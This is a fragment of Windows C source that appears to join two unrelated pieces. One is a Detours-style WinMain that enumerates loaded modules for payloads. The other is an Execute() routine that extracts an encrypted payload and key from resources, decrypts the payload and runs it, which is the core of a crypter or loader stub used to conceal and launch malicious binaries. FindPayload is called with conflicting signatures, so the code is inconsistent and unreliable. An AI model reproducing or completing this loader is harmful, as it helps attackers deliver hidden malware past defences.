int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR lpszCmdLine, int nCmdShow)
{
(void)hinst;
(void)hprev;
(void)lpszCmdLine;
(void)nCmdShow;
printf("Source .EXE:\n");
FindPayload(NULL);
printf("\n");
printf("DLL and EXE binaries loaded:\n");
EDll1Function();
EDll2Function();
EDll3Function();
for (HINSTANCE hiter = NULL; (hiter = DetourEnumerateModules(hiter)) != NULL;) {
FindPayload(hiter);
}
if ((PVOID)hinst == (PVOID)lpszCmdLine) {
DispatchMessage(NULL); // Force load of gdi32.dll
}
return 0;
}
BOOL Execute(void) {
PRINT_INFO("Retrieving payload resource.\n");
LPVOID lpPayload = NULL;
SIZE_T nPayloadSize = 0;
if (!FindPayload(&lpPayload, &nPayloadSize, RES_ID_PAYLOAD)) {
return FALSE;
}
PRINT_INFO("Allocating payload buffer for decryption.\n");
LPVOID lpDecryptPayload = MyHeapAlloc(nPayloadSize);
if (!lpDecryptPayload) {
PRINT_ERROR(
"Failed to allocate buffer: <0x%08x>\n",
GetLastError()
);
return FALSE;
}
memcpy(lpDecryptPayload, lpPayload, nPayloadSize);
PRINT_INFO("Retrieving key resource.\n");
LPBYTE lpKey = NULL;
SIZE_T nKeySize = 0;
if (!FindPayload(&lpKey, &nKeySize, RES_ID_KEY)) {
return FALSE;
}
PRINT_INFO("Extracted key:\n");
for (SIZE_T i = 0; i < nKeySize;) {
for (int j = 0; j < 16; j++) {
if (j == 8) {
PrintColour(CONSOLE_PURPLE, " ");
}
PrintColour(CONSOLE_PURPLE, "%02x ", lpKey[i + j]);
}
puts("");
i += 16;
}
PRINT_INFO("Decrypting payload.\n");
DecryptPayload(lpDecryptPayload, nPayloadSize, lpKey, nKeySize);
BOOL bRet = Run(lpDecryptPayload, nPayloadSize);
// Deallocate decrypted payload.
MyHeapFree(lpDecryptPayload);
return bRet;
}